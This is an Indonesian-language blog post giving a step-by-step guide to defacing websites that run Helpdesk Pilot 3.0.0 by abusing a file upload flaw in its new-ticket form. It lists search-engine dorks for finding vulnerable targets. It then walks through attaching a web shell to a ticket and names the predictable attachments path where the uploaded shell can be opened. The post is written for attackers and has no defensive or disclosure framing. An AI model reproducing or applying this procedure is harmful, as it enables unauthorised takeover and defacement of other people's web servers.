Sore ini ane mau share Cara deface dengan
"Helpdesk Pilot Submit new ticket File Upload Vulnerability"
DORK :
- inurl:"/helpdesk/new_ticket.php?"- intext:"Powered By Helpdesk Pilot 3.0.0 Free"
(kembangkan sendiri bro)
Exploitnya :
new_ticket.php?tab=ticketsmisal :
http://site.com/helpdesk/new_ticket.php?tab=tickets
setelah itu isi semua form sesuai yang kalian mau..
lihat gambar berikut :
Setelah itu pada attach file, pilih shell kamu yang mau di upload ..
Setelah semua form diisi klik SUBMIT
lalu akan muncul seperti ini :
Lihat gambar
dan disana ada nama ticket kalian misal pada ganbar nama ticketnya LT00000322
Shell access berada di /attachments/namaticketSHELL_1.php
misal pada target site.com/helpdesk
shell accessnya di http://site.com/helpdesk/attachments/LT00000322_1.php
jangan lupa tambahkan _1 pada belakang nama ticket seperti diatas ..
kalo masih bingung bisa coret-coret dikomentar ..
Wassalamualaikum wr.wb
0 Response to "Helpdesk Pilot Submit new ticket File Upload Vulnerability"
Posting Komentar